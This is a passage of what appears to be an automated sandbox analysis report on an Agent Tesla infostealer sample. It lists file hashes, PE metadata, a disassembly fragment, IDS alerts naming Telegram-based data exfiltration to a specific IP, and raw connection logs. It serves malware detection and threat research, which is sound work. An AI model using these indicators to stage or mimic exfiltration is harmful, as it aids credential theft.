                                                3b5074b1b5d032e5620f69f9f700ff0eLisectAVT_2403002A_133.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_14.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_14.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_155.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_162.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_2.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_220.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_308.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_308.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                LisectAVT_2403002A_333.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                • 104.26.13.205
                                                No context
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.906401671315325
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:LisectAVT_2403002A_127.exe
                                                File size:697'350 bytes
                                                MD5:67cf14e98914a0ae61cda009d3ed1df7
                                                SHA1:4bf4a1f9365eb649a2fdf1a30b2e4c149fad03dc
                                                SHA256:79d0926744b84fc30f2a528b4aa64b2aa015001616f7062f15695fa00de45081
                                                SHA512:b1edfdb6f9b03c2a9f1a0498bf28b40c1d3a2e4de80c7a8ff29397a9eaa1f787ccc2dbf2f9a69da1c601c963589187f43c2820b683435b8cfcbcfc703046360d
                                                SSDEEP:12288:BJggC74CMw3iOdiDSZnRtnt9iXSSfI5qIFngvpZsG9WxzQaU3y:BJgFoOdjtnOSKPhh6GEQn3
                                                TLSH:AEE4125BBB944377D25603F195AB198573BE602A3231C2581D9090EE1BB3F148A3AFE7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;...............0.................. ........@.. ....................................@................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x4ab782
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xC63BD28A [Thu May 23 03:54:50 2075 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                xor al, 35h
                                                xor eax, 43465138h
                                                push eax
                                                xor eax, 38453452h
                                                xor dl, byte ptr [ecx+eax*2+5Ah]
                                                push esi
                                                dec eax
                                                dec eax
                                                inc ebx
                                                inc esp
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xab72d0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x630.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa9b880x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xa97a00xa98008193fd6706e74e29a5e3aae149a0d41aFalse0.9189553950036873data7.915103665911927IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xac0000x6300x8006595a3cb851e08b0dfc25234ff242d30False0.3388671875data3.4917892739525604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xae0000xc0x200f85008b1c8606e59e24b00d7ccff7558False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0xac0900x3a0data0.41810344827586204
                                                RT_MANIFEST0xac4400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                2024-07-26T00:02:16.228907+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249745443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:20.476194+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249734443192.168.2.6149.154.167.220
                                                2024-07-26T00:03:12.778554+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249755443192.168.2.6149.154.167.220
                                                2024-07-26T00:03:04.473362+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249752443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:18.963992+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249733443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:49.873314+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249750443192.168.2.6149.154.167.220
                                                2024-07-26T00:03:17.387586+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249757443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:30.614435+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249747443192.168.2.6149.154.167.220
                                                2024-07-26T00:00:57.740029+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249730443192.168.2.6149.154.167.220
                                                2024-07-26T00:00:52.810767+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249728443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:08.271354+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249742443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:35.574667+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249736443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:42.459543+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249738443192.168.2.6149.154.167.220
                                                2024-07-25T23:59:27.125307+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971920.12.23.50192.168.2.6
                                                2024-07-26T00:02:21.632702+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249746443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:59.571959+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249751443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:09.266140+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249743443192.168.2.6149.154.167.220
                                                2024-07-26T00:00:59.090939+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249731443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:40.324857+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249737443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:00.361986+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249741443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:22.620409+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249735443192.168.2.6149.154.167.220
                                                2024-07-26T00:03:05.972685+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249753443192.168.2.6149.154.167.220
                                                2024-07-25T23:59:19.197358+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249717443192.168.2.6149.154.167.220
                                                2024-07-26T00:00:04.546790+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972520.12.23.50192.168.2.6
                                                2024-07-26T00:01:48.498588+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249740443192.168.2.6149.154.167.220
                                                2024-07-26T00:01:11.484324+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249732443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:41.578349+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249748443192.168.2.6149.154.167.220
                                                2024-07-26T00:03:08.262544+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249754443192.168.2.6149.154.167.220
                                                2024-07-26T00:02:12.072219+0200TCP2852815ETPRO MALWARE Agent Tesla Telegram Exfil M249744443192.168.2.6149.154.167.220
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 25, 2024 23:59:15.004329920 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.004374981 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.004498959 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.011059046 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.011077881 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.499675035 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.499753952 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.501621962 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.501627922 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.501876116 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.542680979 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.556162119 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.600523949 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.669361115 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.669469118 CEST44349716104.26.13.205192.168.2.6
                                                Jul 25, 2024 23:59:15.669527054 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:15.675133944 CEST49716443192.168.2.6104.26.13.205
                                                Jul 25, 2024 23:59:16.303420067 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:16.303514004 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:16.303597927 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:16.304650068 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:16.304682970 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:16.935292006 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:16.935359001 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:16.937222958 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:16.937232971 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:16.937473059 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:16.938875914 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:16.984503031 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:17.232371092 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:17.232626915 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:17.232650042 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:19.197386980 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:19.197525978 CEST44349717149.154.167.220192.168.2.6
                                                Jul 25, 2024 23:59:19.197617054 CEST49717443192.168.2.6149.154.167.220
                                                Jul 25, 2024 23:59:19.202209949 CEST49717443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:51.852454901 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:51.852505922 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:51.852580070 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:51.853101015 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:51.853111029 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:52.497275114 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:52.510075092 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:52.510094881 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:52.809459925 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:52.810113907 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:52.810136080 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:52.810395002 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:52.810405970 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:52.810713053 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:52.810720921 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:53.157732010 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:53.158307076 CEST44349728149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:53.158354998 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:53.158431053 CEST49728443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:56.496120930 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:56.496181011 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:56.500509977 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:56.500509977 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:56.500559092 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:57.421861887 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:57.423902988 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:57.423923016 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:57.739348888 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:57.739694118 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:57.739720106 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:57.739830971 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:57.739847898 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:57.739914894 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:57.739929914 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:58.075686932 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:58.075733900 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:58.076143980 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:58.076488972 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:58.076498985 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:58.094763041 CEST44349730149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:58.095654964 CEST49730443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:58.765328884 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:58.767230988 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:58.767260075 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.089742899 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.090604067 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:59.090625048 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.090647936 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:59.090662956 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.090681076 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:59.090687037 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.090742111 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:59.090759993 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.090810061 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:59.090817928 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.449945927 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.450288057 CEST44349731149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:00:59.450429916 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:00:59.450613976 CEST49731443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:10.496318102 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:10.496375084 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:10.497860909 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:10.498084068 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:10.498092890 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.150144100 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.152102947 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:11.152116060 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.483280897 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.483995914 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:11.484018087 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.484029055 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:11.484034061 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.484106064 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:11.484117031 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.484287977 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:11.484296083 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.832446098 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.832613945 CEST44349732149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:11.832660913 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:11.833260059 CEST49732443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.026664019 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.026700974 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.026993990 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.030108929 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.030123949 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.657047987 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.659035921 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.659050941 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.958671093 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.960464001 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.960499048 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.962866068 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.962897062 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:18.963913918 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:18.963931084 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:19.317627907 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:19.317730904 CEST44349733149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:19.317996979 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:19.318217993 CEST49733443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:19.452750921 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:19.452796936 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:19.452864885 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:19.453243017 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:19.453254938 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.133105993 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.134874105 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:20.134902954 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.475481987 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.475881100 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:20.475917101 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.475996017 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:20.476010084 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.476078033 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:20.476087093 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.832113981 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.832657099 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:20.832679033 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.832777977 CEST44349734149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:20.832851887 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:20.832876921 CEST49734443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:21.656552076 CEST49735443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:21.656605005 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:21.656732082 CEST49735443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:21.657088041 CEST49735443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:21.657098055 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:22.300020933 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:22.302187920 CEST49735443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:22.302212000 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:22.619575024 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:22.619951963 CEST49735443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:22.619976997 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:22.620126963 CEST49735443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:01:22.620137930 CEST44349735149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:01:22.620208025 CEST49735443192.168.2.6149.154.167.220
